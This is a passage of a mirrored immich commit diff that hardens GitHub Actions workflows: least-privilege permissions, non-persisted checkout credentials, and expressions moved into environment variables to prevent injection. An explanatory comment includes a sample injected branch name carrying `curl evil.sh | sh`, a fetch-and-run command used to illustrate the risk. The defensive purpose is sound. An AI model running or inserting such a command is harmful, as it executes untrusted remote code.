mirror of https://github.com/immich-app/immich.git (synced 2025-07-09 03:04:16 -04:00)

commit 5fc1a63810: Merge branch 'main' into feat/sqlite-device-assets

# Conflicts:
#	mobile/lib/domain/utils/background_sync.dart
.github/workflows/build-mobile.yml (vendored): 29 changes

@@ -7,6 +7,15 @@ on:
       ref:
         required: false
         type: string
+  secrets:
+    KEY_JKS:
+      required: true
+    ALIAS:
+      required: true
+    ANDROID_KEY_PASSWORD:
+      required: true
+    ANDROID_STORE_PASSWORD:
+      required: true
   pull_request:
   push:
     branches: [main]
@@ -15,14 +24,21 @@ concurrency:
   group: ${{ github.workflow }}-${{ github.ref }}
   cancel-in-progress: true
 
+permissions: {}
+
 jobs:
   pre-job:
     runs-on: ubuntu-latest
+    permissions:
+      contents: read
     outputs:
       should_run: ${{ steps.found_paths.outputs.mobile == 'true' || steps.should_force.outputs.should_force == 'true' }}
     steps:
       - name: Checkout code
         uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
+        with:
+          persist-credentials: false
+
       - id: found_paths
         uses: dorny/paths-filter@de90cc6fb38fc0963ad72b210f1f284cd68cea36 # v3
         with:
@@ -38,22 +54,17 @@ jobs:
   build-sign-android:
     name: Build and sign Android
     needs: pre-job
+    permissions:
+      contents: read
     # Skip when PR from a fork
     if: ${{ !github.event.pull_request.head.repo.fork && github.actor != 'dependabot[bot]' && needs.pre-job.outputs.should_run == 'true' }}
     runs-on: macos-14
 
     steps:
-      - name: Determine ref
-        id: get-ref
-        run: |
-          input_ref="${{ inputs.ref }}"
-          github_ref="${{ github.sha }}"
-          ref="${input_ref:-$github_ref}"
-          echo "ref=$ref" >> $GITHUB_OUTPUT
-
       - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
         with:
-          ref: ${{ steps.get-ref.outputs.ref }}
+          ref: ${{ inputs.ref || github.sha }}
+          persist-credentials: false
 
       - uses: actions/setup-java@c5195efecf7bdfc987ee8bae7a71cb8b11521c00 # v4
         with:
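The deleted `get-ref` step computed a fallback ref in shell; the `||` operator inside an expression does the same natively, since GitHub expressions treat an empty or unset input as falsy. A minimal sketch of the pattern, detached from this workflow (trigger and job are illustrative, and the action is left unpinned only for brevity):

on:
  workflow_call:
    inputs:
      ref:
        required: false
        type: string

jobs:
  demo:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          # An empty inputs.ref is falsy, so this falls back to the
          # commit that triggered the run.
          ref: ${{ inputs.ref || github.sha }}
          # Do not leave the job token behind in .git/config.
          persist-credentials: false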
.github/workflows/cache-cleanup.yml (vendored): 17 changes

@@ -8,31 +8,38 @@ concurrency:
   group: ${{ github.workflow }}-${{ github.ref }}
   cancel-in-progress: true
 
+permissions: {}
+
 jobs:
   cleanup:
     name: Cleanup
     runs-on: ubuntu-latest
+    permissions:
+      contents: read
+      actions: write
     steps:
       - name: Check out code
         uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
+        with:
+          persist-credentials: false
 
       - name: Cleanup
+        env:
+          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+          REF: ${{ github.ref }}
         run: |
           gh extension install actions/gh-actions-cache
 
           REPO=${{ github.repository }}
-          BRANCH=${{ github.ref }}
 
           echo "Fetching list of cache keys"
-          cacheKeysForPR=$(gh actions-cache list -R $REPO -B $BRANCH -L 100 | cut -f 1 )
+          cacheKeysForPR=$(gh actions-cache list -R $REPO -B ${REF} -L 100 | cut -f 1 )
 
           ## Setting this to not fail the workflow while deleting cache keys.
           set +e
           echo "Deleting caches..."
           for cacheKey in $cacheKeysForPR
           do
-            gh actions-cache delete $cacheKey -R $REPO -B $BRANCH --confirm
+            gh actions-cache delete $cacheKey -R "$REPO" -B "${REF}" --confirm
           done
           echo "Done"
-        env:
-          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
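The shell rewrite above is the commit's recurring hardening pattern: a `${{ }}` expression is expanded into the script text before bash ever runs, so attacker-influenced values (branch names, PR titles, changed-file lists) can smuggle in commands, while a value passed through `env:` reaches the shell as plain data. A minimal sketch of the pattern, with an illustrative step:

jobs:
  demo:
    runs-on: ubuntu-latest
    steps:
      - name: Interpolate safely
        env:
          # Expanded once by the runner into an environment variable,
          # never spliced into the script source.
          REF: ${{ github.ref }}
        run: |
          # To bash, "$REF" is ordinary data: a ref named
          # 'main"; curl evil.sh | sh' cannot escape the quotes.
          echo "Cleaning caches for ${REF}"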
.github/workflows/cli.yml (vendored): 13 changes

@@ -16,19 +16,23 @@ concurrency:
   group: ${{ github.workflow }}-${{ github.ref }}
   cancel-in-progress: true
 
-permissions:
-  packages: write
+permissions: {}
 
 jobs:
   publish:
     name: CLI Publish
     runs-on: ubuntu-latest
+    permissions:
+      contents: read
     defaults:
       run:
         working-directory: ./cli
 
     steps:
       - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
+        with:
+          persist-credentials: false
 
       # Setup .npmrc file to publish to npm
       - uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4
         with:
@@ -48,11 +52,16 @@ jobs:
   docker:
     name: Docker
     runs-on: ubuntu-latest
+    permissions:
+      contents: read
+      packages: write
     needs: publish
 
     steps:
       - name: Checkout
         uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
+        with:
+          persist-credentials: false
 
       - name: Set up QEMU
         uses: docker/setup-qemu-action@29109295f81e9208d7d86ff1c6c12d2833863392 # v3.6.0
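The permissions change follows the same least-privilege shape in every file of this commit: an empty `permissions: {}` map at the workflow level revokes the token's default grants, and each job re-requests only what it actually uses. A sketch of the shape, assuming a job that pushes to GHCR:

permissions: {}   # workflow level: the token starts with nothing

jobs:
  build:
    runs-on: ubuntu-latest
    permissions:
      contents: read   # enough to check out the repository
      packages: write  # enough to push an image to GHCR
    steps:
      - uses: actions/checkout@v4
        with:
          persist-credentials: false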
.github/workflows/codeql-analysis.yml (vendored): 4 changes

@@ -24,6 +24,8 @@ concurrency:
   group: ${{ github.workflow }}-${{ github.ref }}
   cancel-in-progress: true
 
+permissions: {}
+
 jobs:
   analyze:
     name: Analyze
@@ -43,6 +45,8 @@ jobs:
     steps:
       - name: Checkout repository
         uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
+        with:
+          persist-credentials: false
 
       # Initializes the CodeQL tools for scanning.
       - name: Initialize CodeQL
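`persist-credentials: false` shows up on nearly every checkout in this commit. By default, actions/checkout writes the job's token into the local git config so later steps can push; that also means any later step, including a compromised third-party action, can read it. With persistence off, a step that genuinely needs to push receives a token explicitly instead. A sketch under that assumption (the push step is illustrative, not from these workflows):

steps:
  - uses: actions/checkout@v4
    with:
      persist-credentials: false

  - name: Push a tag (only this step sees a token)
    env:
      GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
    run: |
      # x-access-token basic auth is the usual form for GitHub tokens.
      git push "https://x-access-token:${GH_TOKEN}@github.com/${GITHUB_REPOSITORY}.git" "HEAD:refs/tags/v0.0.0-demo"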
.github/workflows/docker.yml (vendored): 85 changes

@@ -12,18 +12,21 @@ concurrency:
   group: ${{ github.workflow }}-${{ github.ref }}
   cancel-in-progress: true
 
-permissions:
-  packages: write
+permissions: {}
 
 jobs:
   pre-job:
     runs-on: ubuntu-latest
+    permissions:
+      contents: read
     outputs:
       should_run_server: ${{ steps.found_paths.outputs.server == 'true' || steps.should_force.outputs.should_force == 'true' }}
       should_run_ml: ${{ steps.found_paths.outputs.machine-learning == 'true' || steps.should_force.outputs.should_force == 'true' }}
     steps:
       - name: Checkout code
         uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
+        with:
+          persist-credentials: false
       - id: found_paths
         uses: dorny/paths-filter@de90cc6fb38fc0963ad72b210f1f284cd68cea36 # v3
         with:
@@ -45,6 +48,9 @@ jobs:
   retag_ml:
     name: Re-Tag ML
     needs: pre-job
+    permissions:
+      contents: read
+      packages: write
     if: ${{ needs.pre-job.outputs.should_run_ml == 'false' && !github.event.pull_request.head.repo.fork }}
     runs-on: ubuntu-latest
     strategy:
@@ -58,18 +64,22 @@ jobs:
           username: ${{ github.repository_owner }}
           password: ${{ secrets.GITHUB_TOKEN }}
       - name: Re-tag image
+        env:
+          REGISTRY_NAME: 'ghcr.io'
+          REPOSITORY: ${{ github.repository_owner }}/immich-machine-learning
+          TAG_OLD: main${{ matrix.suffix }}
+          TAG_PR: ${{ github.event.number == 0 && github.ref_name || format('pr-{0}', github.event.number) }}${{ matrix.suffix }}
+          TAG_COMMIT: commit-${{ github.event_name != 'pull_request' && github.sha || github.event.pull_request.head.sha }}${{ matrix.suffix }}
         run: |
-          REGISTRY_NAME="ghcr.io"
-          REPOSITORY=${{ github.repository_owner }}/immich-machine-learning
-          TAG_OLD=main${{ matrix.suffix }}
-          TAG_PR=${{ github.event.number == 0 && github.ref_name || format('pr-{0}', github.event.number) }}${{ matrix.suffix }}
-          TAG_COMMIT=commit-${{ github.event_name != 'pull_request' && github.sha || github.event.pull_request.head.sha }}${{ matrix.suffix }}
-          docker buildx imagetools create -t $REGISTRY_NAME/$REPOSITORY:$TAG_PR $REGISTRY_NAME/$REPOSITORY:$TAG_OLD
-          docker buildx imagetools create -t $REGISTRY_NAME/$REPOSITORY:$TAG_COMMIT $REGISTRY_NAME/$REPOSITORY:$TAG_OLD
+          docker buildx imagetools create -t "${REGISTRY_NAME}/${REPOSITORY}:${TAG_PR}" "${REGISTRY_NAME}/${REPOSITORY}:${TAG_OLD}"
+          docker buildx imagetools create -t "${REGISTRY_NAME}/${REPOSITORY}:${TAG_COMMIT}" "${REGISTRY_NAME}/${REPOSITORY}:${TAG_OLD}"
 
   retag_server:
     name: Re-Tag Server
     needs: pre-job
+    permissions:
+      contents: read
+      packages: write
     if: ${{ needs.pre-job.outputs.should_run_server == 'false' && !github.event.pull_request.head.repo.fork }}
     runs-on: ubuntu-latest
     strategy:
@@ -83,18 +93,22 @@ jobs:
           username: ${{ github.repository_owner }}
           password: ${{ secrets.GITHUB_TOKEN }}
       - name: Re-tag image
+        env:
+          REGISTRY_NAME: 'ghcr.io'
+          REPOSITORY: ${{ github.repository_owner }}/immich-server
+          TAG_OLD: main${{ matrix.suffix }}
+          TAG_PR: ${{ github.event.number == 0 && github.ref_name || format('pr-{0}', github.event.number) }}${{ matrix.suffix }}
+          TAG_COMMIT: commit-${{ github.event_name != 'pull_request' && github.sha || github.event.pull_request.head.sha }}${{ matrix.suffix }}
         run: |
-          REGISTRY_NAME="ghcr.io"
-          REPOSITORY=${{ github.repository_owner }}/immich-server
-          TAG_OLD=main${{ matrix.suffix }}
-          TAG_PR=${{ github.event.number == 0 && github.ref_name || format('pr-{0}', github.event.number) }}${{ matrix.suffix }}
-          TAG_COMMIT=commit-${{ github.event_name != 'pull_request' && github.sha || github.event.pull_request.head.sha }}${{ matrix.suffix }}
-          docker buildx imagetools create -t $REGISTRY_NAME/$REPOSITORY:$TAG_PR $REGISTRY_NAME/$REPOSITORY:$TAG_OLD
-          docker buildx imagetools create -t $REGISTRY_NAME/$REPOSITORY:$TAG_COMMIT $REGISTRY_NAME/$REPOSITORY:$TAG_OLD
+          docker buildx imagetools create -t "${REGISTRY_NAME}/${REPOSITORY}:${TAG_PR}" "${REGISTRY_NAME}/${REPOSITORY}:${TAG_OLD}"
+          docker buildx imagetools create -t "${REGISTRY_NAME}/${REPOSITORY}:${TAG_COMMIT}" "${REGISTRY_NAME}/${REPOSITORY}:${TAG_OLD}"
 
   build_and_push_ml:
     name: Build and Push ML
     needs: pre-job
+    permissions:
+      contents: read
+      packages: write
     if: ${{ needs.pre-job.outputs.should_run_ml == 'true' }}
     runs-on: ${{ matrix.runner }}
     env:
@@ -148,6 +162,8 @@ jobs:
 
       - name: Checkout
         uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
+        with:
+          persist-credentials: false
 
       - name: Set up Docker Buildx
         uses: docker/setup-buildx-action@b5ca514318bd6ebac0fb2aedd5d36ec1b5c232a2 # v3.10.0
@@ -161,11 +177,14 @@ jobs:
           password: ${{ secrets.GITHUB_TOKEN }}
 
       - name: Generate cache key suffix
+        env:
+          REF: ${{ github.ref_name }}
         run: |
           if [[ "${{ github.event_name }}" == "pull_request" ]]; then
             echo "CACHE_KEY_SUFFIX=pr-${{ github.event.number }}" >> $GITHUB_ENV
           else
-            echo "CACHE_KEY_SUFFIX=$(echo ${{ github.ref_name }} | sed 's/[^a-zA-Z0-9]/-/g')" >> $GITHUB_ENV
+            SUFFIX=$(echo "${REF}" | sed 's/[^a-zA-Z0-9]/-/g')
+            echo "CACHE_KEY_SUFFIX=${SUFFIX}" >> $GITHUB_ENV
           fi
 
       - name: Generate cache target
@@ -175,7 +194,7 @@ jobs:
             # Essentially just ignore the cache output (forks can't write to registry cache)
             echo "cache-to=type=local,dest=/tmp/discard,ignore-error=true" >> $GITHUB_OUTPUT
           else
-            echo "cache-to=type=registry,ref=${{ env.GHCR_REPO }}-build-cache:${{ env.PLATFORM_PAIR }}-${{ matrix.device }}-${{ env.CACHE_KEY_SUFFIX }},mode=max,compression=zstd" >> $GITHUB_OUTPUT
+            echo "cache-to=type=registry,ref=${GHCR_REPO}-build-cache:${PLATFORM_PAIR}-${{ matrix.device }}-${CACHE_KEY_SUFFIX},mode=max,compression=zstd" >> $GITHUB_OUTPUT
           fi
 
       - name: Generate docker image tags
@@ -221,6 +240,10 @@ jobs:
   merge_ml:
     name: Merge & Push ML
     runs-on: ubuntu-latest
+    permissions:
+      contents: read
+      actions: read
+      packages: write
     if: ${{ needs.pre-job.outputs.should_run_ml == 'true' && !github.event.pull_request.head.repo.fork }}
     env:
       GHCR_REPO: ghcr.io/${{ github.repository_owner }}/immich-machine-learning
@@ -308,15 +331,16 @@ jobs:
           fi
 
           TAGS=$(jq -cr '.tags | map("-t " + .) | join(" ")' <<< "$DOCKER_METADATA_OUTPUT_JSON") \
-          SOURCE_ARGS=$(printf '${{ env.GHCR_REPO }}@sha256:%s ' *)
-
-          echo "docker buildx imagetools create $TAGS "${ANNOTATIONS[@]}" $SOURCE_ARGS"
+          SOURCE_ARGS=$(printf "${GHCR_REPO}@sha256:%s " *)
 
           docker buildx imagetools create $TAGS "${ANNOTATIONS[@]}" $SOURCE_ARGS
 
   build_and_push_server:
     name: Build and Push Server
     runs-on: ${{ matrix.runner }}
+    permissions:
+      contents: read
+      packages: write
     needs: pre-job
     if: ${{ needs.pre-job.outputs.should_run_server == 'true' }}
     env:
@@ -340,6 +364,8 @@ jobs:
 
       - name: Checkout
         uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
+        with:
+          persist-credentials: false
 
       - name: Set up Docker Buildx
         uses: docker/setup-buildx-action@b5ca514318bd6ebac0fb2aedd5d36ec1b5c232a2 # v3
@@ -353,11 +379,14 @@ jobs:
           password: ${{ secrets.GITHUB_TOKEN }}
 
       - name: Generate cache key suffix
+        env:
+          REF: ${{ github.ref_name }}
         run: |
           if [[ "${{ github.event_name }}" == "pull_request" ]]; then
             echo "CACHE_KEY_SUFFIX=pr-${{ github.event.number }}" >> $GITHUB_ENV
           else
-            echo "CACHE_KEY_SUFFIX=$(echo ${{ github.ref_name }} | sed 's/[^a-zA-Z0-9]/-/g')" >> $GITHUB_ENV
+            SUFFIX=$(echo "${REF}" | sed 's/[^a-zA-Z0-9]/-/g')
+            echo "CACHE_KEY_SUFFIX=${SUFFIX}" >> $GITHUB_ENV
           fi
 
       - name: Generate cache target
@@ -367,7 +396,7 @@ jobs:
             # Essentially just ignore the cache output (forks can't write to registry cache)
             echo "cache-to=type=local,dest=/tmp/discard,ignore-error=true" >> $GITHUB_OUTPUT
           else
-            echo "cache-to=type=registry,ref=${{ env.GHCR_REPO }}-build-cache:${{ env.PLATFORM_PAIR }}-${{ env.CACHE_KEY_SUFFIX }},mode=max,compression=zstd" >> $GITHUB_OUTPUT
+            echo "cache-to=type=registry,ref=${GHCR_REPO}-build-cache:${PLATFORM_PAIR}-${CACHE_KEY_SUFFIX},mode=max,compression=zstd" >> $GITHUB_OUTPUT
           fi
 
       - name: Generate docker image tags
@@ -413,6 +442,10 @@ jobs:
   merge_server:
     name: Merge & Push Server
     runs-on: ubuntu-latest
+    permissions:
+      contents: read
+      actions: read
+      packages: write
     if: ${{ needs.pre-job.outputs.should_run_server == 'true' && !github.event.pull_request.head.repo.fork }}
     env:
       GHCR_REPO: ghcr.io/${{ github.repository_owner }}/immich-server
@@ -486,15 +519,14 @@ jobs:
           fi
 
           TAGS=$(jq -cr '.tags | map("-t " + .) | join(" ")' <<< "$DOCKER_METADATA_OUTPUT_JSON") \
-          SOURCE_ARGS=$(printf '${{ env.GHCR_REPO }}@sha256:%s ' *)
-
-          echo "docker buildx imagetools create $TAGS "${ANNOTATIONS[@]}" $SOURCE_ARGS"
+          SOURCE_ARGS=$(printf "${GHCR_REPO}@sha256:%s " *)
 
           docker buildx imagetools create $TAGS "${ANNOTATIONS[@]}" $SOURCE_ARGS
 
   success-check-server:
     name: Docker Build & Push Server Success
     needs: [merge_server, retag_server]
+    permissions: {}
     runs-on: ubuntu-latest
     if: always()
     steps:
@@ -508,6 +540,7 @@ jobs:
   success-check-ml:
     name: Docker Build & Push ML Success
     needs: [merge_ml, retag_ml]
+    permissions: {}
     runs-on: ubuntu-latest
     if: always()
     steps:
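Moving the tag variables into `env:` and quoting them changes nothing about what `docker buildx imagetools create` does: it still makes a new tag name point at an existing manifest list, so a multi-arch image is re-tagged without pulling or rebuilding any layers. A standalone sketch of the same operation, with placeholder image names:

jobs:
  retag:
    runs-on: ubuntu-latest
    permissions:
      packages: write
    steps:
      - name: Re-tag without rebuilding
        env:
          IMAGE: ghcr.io/example/app             # placeholder repository
          TAG_OLD: main                          # existing manifest list
          TAG_NEW: pr-${{ github.event.number }} # expanded once, as data
        run: |
          # TAG_NEW becomes another name for TAG_OLD's manifest list.
          docker buildx imagetools create -t "${IMAGE}:${TAG_NEW}" "${IMAGE}:${TAG_OLD}"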
.github/workflows/docs-build.yml (vendored): 10 changes

@@ -10,14 +10,20 @@ concurrency:
   group: ${{ github.workflow }}-${{ github.ref }}
   cancel-in-progress: true
 
+permissions: {}
+
 jobs:
   pre-job:
     runs-on: ubuntu-latest
+    permissions:
+      contents: read
     outputs:
       should_run: ${{ steps.found_paths.outputs.docs == 'true' || steps.should_force.outputs.should_force == 'true' }}
     steps:
       - name: Checkout code
         uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
+        with:
+          persist-credentials: false
       - id: found_paths
         uses: dorny/paths-filter@de90cc6fb38fc0963ad72b210f1f284cd68cea36 # v3
         with:
@@ -33,6 +39,8 @@ jobs:
   build:
     name: Docs Build
     needs: pre-job
+    permissions:
+      contents: read
     if: ${{ needs.pre-job.outputs.should_run == 'true' }}
     runs-on: ubuntu-latest
     defaults:
@@ -42,6 +50,8 @@ jobs:
     steps:
       - name: Checkout code
         uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
+        with:
+          persist-credentials: false
 
       - name: Setup Node
         uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4
.github/workflows/docs-deploy.yml (vendored): 20 changes

@@ -9,6 +9,9 @@ jobs:
   checks:
     name: Docs Deploy Checks
     runs-on: ubuntu-latest
+    permissions:
+      actions: read
+      pull-requests: read
     outputs:
       parameters: ${{ steps.parameters.outputs.result }}
       artifact: ${{ steps.get-artifact.outputs.result }}
@@ -36,6 +39,8 @@ jobs:
       - name: Determine deploy parameters
         id: parameters
         uses: actions/github-script@60a0d83039c74a4aee543508d2ffcb1c3799cdea # v7
+        env:
+          HEAD_SHA: ${{ github.event.workflow_run.head_sha }}
         with:
           script: |
             const eventType = context.payload.workflow_run.event;
@@ -57,7 +62,8 @@ jobs:
             } else if (eventType == "pull_request") {
               let pull_number = context.payload.workflow_run.pull_requests[0]?.number;
               if(!pull_number) {
-                const response = await github.rest.search.issuesAndPullRequests({q: 'repo:${{ github.repository }} is:pr sha:${{ github.event.workflow_run.head_sha }}',per_page: 1,})
+                const {HEAD_SHA} = process.env;
+                const response = await github.rest.search.issuesAndPullRequests({q: `repo:${{ github.repository }} is:pr sha:${HEAD_SHA}`,per_page: 1,})
                 const items = response.data.items
                 if (items.length < 1) {
                   throw new Error("No pull request found for the commit")
@@ -95,10 +101,16 @@ jobs:
     name: Docs Deploy
     runs-on: ubuntu-latest
     needs: checks
+    permissions:
+      contents: read
+      actions: read
+      pull-requests: write
     if: ${{ fromJson(needs.checks.outputs.artifact).found && fromJson(needs.checks.outputs.parameters).shouldDeploy }}
     steps:
       - name: Checkout code
         uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
+        with:
+          persist-credentials: false
 
       - name: Load parameters
         id: parameters
@@ -162,9 +174,11 @@ jobs:
 
       - name: Output Cleaning
         id: clean
+        env:
+          TG_OUTPUT: ${{ steps.docs-output.outputs.tg_action_output }}
         run: |
-          TG_OUT=$(echo '${{ steps.docs-output.outputs.tg_action_output }}' | sed 's|%0A|\n|g ; s|%3C|<|g' | jq -c .)
-          echo "output=$TG_OUT" >> $GITHUB_OUTPUT
+          CLEANED=$(echo "$TG_OUTPUT" | sed 's|%0A|\n|g ; s|%3C|<|g' | jq -c .)
+          echo "output=$CLEANED" >> $GITHUB_OUTPUT
 
       - name: Publish to Cloudflare Pages
         uses: cloudflare/pages-action@f0a1cd58cd66095dee69bfa18fa5efd1dde93bca # v1
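The `actions/github-script` change is the JavaScript variant of the same fix: a value spliced into `script:` with `${{ }}` becomes program text, while a value passed through `env:` arrives as an inert `process.env` string. A minimal sketch of the pattern (step name and query are illustrative):

steps:
  - name: Find the PR for a commit
    uses: actions/github-script@v7
    env:
      # Reaches Node as process.env.HEAD_SHA, not as script source.
      HEAD_SHA: ${{ github.event.workflow_run.head_sha }}
    with:
      script: |
        const { HEAD_SHA } = process.env;
        // The query string is assembled at runtime from plain strings.
        const response = await github.rest.search.issuesAndPullRequests({
          q: `repo:${context.repo.owner}/${context.repo.repo} is:pr sha:${HEAD_SHA}`,
          per_page: 1,
        });
        return response.data.items[0]?.number;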
.github/workflows/docs-destroy.yml (vendored): 7 changes

@@ -3,13 +3,20 @@ on:
   pull_request_target:
     types: [closed]
 
+permissions: {}
+
 jobs:
   deploy:
     name: Docs Destroy
     runs-on: ubuntu-latest
+    permissions:
+      contents: read
+      pull-requests: write
     steps:
       - name: Checkout code
         uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
+        with:
+          persist-credentials: false
 
       - name: Destroy Docs Subdomain
         env:
.github/workflows/fix-format.yml (vendored): 4 changes

@@ -4,11 +4,14 @@ on:
   pull_request:
     types: [labeled]
 
+permissions: {}
+
 jobs:
   fix-formatting:
     runs-on: ubuntu-latest
     if: ${{ github.event.label.name == 'fix:formatting' }}
     permissions:
+      contents: write
       pull-requests: write
     steps:
       - name: Generate a token
@@ -23,6 +26,7 @@ jobs:
         with:
           ref: ${{ github.event.pull_request.head.ref }}
           token: ${{ steps.generate-token.outputs.token }}
+          persist-credentials: true
 
       - name: Setup Node
         uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4
.github/workflows/pr-label-validation.yml (vendored): 2 changes

@@ -4,6 +4,8 @@ on:
   pull_request_target:
     types: [opened, labeled, unlabeled, synchronize]
 
+permissions: {}
+
 jobs:
   validate-release-label:
     runs-on: ubuntu-latest
.github/workflows/pr-labeler.yml (vendored): 2 changes

@@ -2,6 +2,8 @@ name: 'Pull Request Labeler'
 on:
   - pull_request_target
 
+permissions: {}
+
 jobs:
   labeler:
     permissions:
@@ -4,9 +4,13 @@ on:
   pull_request:
     types: [opened, synchronize, reopened, edited]
 
+permissions: {}
+
 jobs:
   validate-pr-title:
     runs-on: ubuntu-latest
+    permissions:
+      pull-requests: write
     steps:
       - name: PR Conventional Commit Validation
         uses: ytanikin/PRConventionalCommits@b628c5a234cc32513014b7bfdd1e47b532124d98 # 1.3.0
.github/workflows/prepare-release.yml (vendored): 18 changes

@@ -21,13 +21,14 @@ concurrency:
   group: ${{ github.workflow }}-${{ github.ref }}-root
   cancel-in-progress: true
 
+permissions: {}
+
 jobs:
   bump_version:
     runs-on: ubuntu-latest
 
     outputs:
       ref: ${{ steps.push-tag.outputs.commit_long_sha }}
+    permissions: {} # No job-level permissions are needed because it uses the app-token
     steps:
       - name: Generate a token
         id: generate-token
@@ -40,6 +41,7 @@ jobs:
         uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
         with:
           token: ${{ steps.generate-token.outputs.token }}
+          persist-credentials: true
 
       - name: Install uv
         uses: astral-sh/setup-uv@0c5e2b8115b80b4c7c5ddf6ffdd634974642d182 # v5
@@ -59,14 +61,20 @@ jobs:
   build_mobile:
     uses: ./.github/workflows/build-mobile.yml
     needs: bump_version
-    secrets: inherit
+    secrets:
+      KEY_JKS: ${{ secrets.KEY_JKS }}
+      ALIAS: ${{ secrets.ALIAS }}
+      ANDROID_KEY_PASSWORD: ${{ secrets.ANDROID_KEY_PASSWORD }}
+      ANDROID_STORE_PASSWORD: ${{ secrets.ANDROID_STORE_PASSWORD }}
     with:
       ref: ${{ needs.bump_version.outputs.ref }}
 
   prepare_release:
     runs-on: ubuntu-latest
     needs: build_mobile
+    permissions:
+      actions: read # To download the app artifact
+      # No content permissions are needed because it uses the app-token
     steps:
       - name: Generate a token
         id: generate-token
@@ -79,6 +87,7 @@ jobs:
         uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
         with:
           token: ${{ steps.generate-token.outputs.token }}
+          persist-credentials: false
 
       - name: Download APK
         uses: actions/download-artifact@95815c38cf2ff2164869cbab79da8d1f422bc89e # v4
@@ -90,6 +99,7 @@ jobs:
         with:
           draft: true
           tag_name: ${{ env.IMMICH_VERSION }}
+          token: ${{ steps.generate-token.outputs.token }}
           generate_release_notes: true
           body_path: misc/release/notes.tmpl
           files: |
.github/workflows/preview-label.yaml
vendored
2
.github/workflows/preview-label.yaml
vendored
@ -4,6 +4,8 @@ on:
|
|||||||
pull_request:
|
pull_request:
|
||||||
types: [labeled, closed]
|
types: [labeled, closed]
|
||||||
|
|
||||||
|
permissions: {}
|
||||||
|
|
||||||
jobs:
|
jobs:
|
||||||
comment-status:
|
comment-status:
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
|
.github/workflows/sdk.yml (vendored): 8 changes

@@ -4,18 +4,22 @@ on:
   release:
     types: [published]
 
-permissions:
-  packages: write
+permissions: {}
 
 jobs:
   publish:
     name: Publish `@immich/sdk`
     runs-on: ubuntu-latest
+    permissions:
+      contents: read
     defaults:
       run:
         working-directory: ./open-api/typescript-sdk
     steps:
       - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
+        with:
+          persist-credentials: false
 
       # Setup .npmrc file to publish to npm
       - uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4
         with:
.github/workflows/static_analysis.yml (vendored): 16 changes

@@ -9,14 +9,20 @@ concurrency:
   group: ${{ github.workflow }}-${{ github.ref }}
   cancel-in-progress: true
 
+permissions: {}
+
 jobs:
   pre-job:
     runs-on: ubuntu-latest
+    permissions:
+      contents: read
     outputs:
       should_run: ${{ steps.found_paths.outputs.mobile == 'true' || steps.should_force.outputs.should_force == 'true' }}
     steps:
       - name: Checkout code
         uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
+        with:
+          persist-credentials: false
       - id: found_paths
         uses: dorny/paths-filter@de90cc6fb38fc0963ad72b210f1f284cd68cea36 # v3
         with:
@@ -33,12 +39,14 @@ jobs:
     name: Run Dart Code Analysis
     needs: pre-job
     if: ${{ needs.pre-job.outputs.should_run == 'true' }}
 
     runs-on: ubuntu-latest
+    permissions:
+      contents: read
     steps:
       - name: Checkout code
         uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
+        with:
+          persist-credentials: false
 
       - name: Setup Flutter SDK
         uses: subosito/flutter-action@e938fdf56512cc96ef2f93601a5a40bde3801046 # v2
@@ -69,9 +77,11 @@ jobs:
 
       - name: Verify files have not changed
         if: steps.verify-changed-files.outputs.files_changed == 'true'
+        env:
+          CHANGED_FILES: ${{ steps.verify-changed-files.outputs.changed_files }}
         run: |
           echo "ERROR: Generated files not up to date! Run make_build inside the mobile directory"
-          echo "Changed files: ${{ steps.verify-changed-files.outputs.changed_files }}"
+          echo "Changed files: ${CHANGED_FILES}"
           exit 1
 
       - name: Run dart analyze
80
.github/workflows/test.yml
vendored
80
.github/workflows/test.yml
vendored
@ -9,9 +9,13 @@ concurrency:
|
|||||||
group: ${{ github.workflow }}-${{ github.ref }}
|
group: ${{ github.workflow }}-${{ github.ref }}
|
||||||
cancel-in-progress: true
|
cancel-in-progress: true
|
||||||
|
|
||||||
|
permissions: {}
|
||||||
|
|
||||||
jobs:
|
jobs:
|
||||||
pre-job:
|
pre-job:
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
|
permissions:
|
||||||
|
contents: read
|
||||||
outputs:
|
outputs:
|
||||||
should_run_web: ${{ steps.found_paths.outputs.web == 'true' || steps.should_force.outputs.should_force == 'true' }}
|
should_run_web: ${{ steps.found_paths.outputs.web == 'true' || steps.should_force.outputs.should_force == 'true' }}
|
||||||
should_run_server: ${{ steps.found_paths.outputs.server == 'true' || steps.should_force.outputs.should_force == 'true' }}
|
should_run_server: ${{ steps.found_paths.outputs.server == 'true' || steps.should_force.outputs.should_force == 'true' }}
|
||||||
@ -25,6 +29,9 @@ jobs:
|
|||||||
steps:
|
steps:
|
||||||
- name: Checkout code
|
